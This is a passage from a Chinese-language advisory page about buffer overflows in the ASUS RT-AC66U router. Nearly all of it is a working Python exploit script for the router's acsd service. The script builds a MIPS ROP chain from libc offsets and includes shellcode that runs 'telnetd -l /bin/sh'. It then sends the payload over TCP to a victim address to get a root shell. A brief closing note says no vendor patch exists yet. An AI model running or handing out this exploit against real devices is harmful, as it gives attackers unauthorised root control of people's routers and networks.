AC66U多个缓冲区溢出漏洞(CVE(2)

# ROP gadget #4
    # move    t9,a1
    # addiu  a0,a0,56
    # jr      t9
    # move    a1,a2
    ra3 = struct.pack("<L", libc_base + 0x3167c)

# jalr sp
    jalr_sp =  "\x09\xf8\xa0\x03"
   
    JuNk = "\x42" * 510
    safeNop = "2Aa3"

#80 Bytes system() Shellcode by Jacob Holcomb of ISE
    #Calling system() and executing telnetd -l /bin/sh
    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
    shellcode += "\x41\x61\x33"

sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
    sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
    sploit += safeNop + shellcode

try:
        print "\n [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()     
        sleep(1)
        exit(0)   

try:
        print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)

try:
        print """ [*] Attempting to exploit the acsd param command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        net_sock.send(sploit)
        sleep(1)
    except:
        print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)

try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
        net_sock.close()
    except:
        print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
        sleep(1)
        exit(0)

if __name__ == "__main__":
    main()

建议：
--------------------------------------------------------------------------------
厂商补丁：

Asus
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

;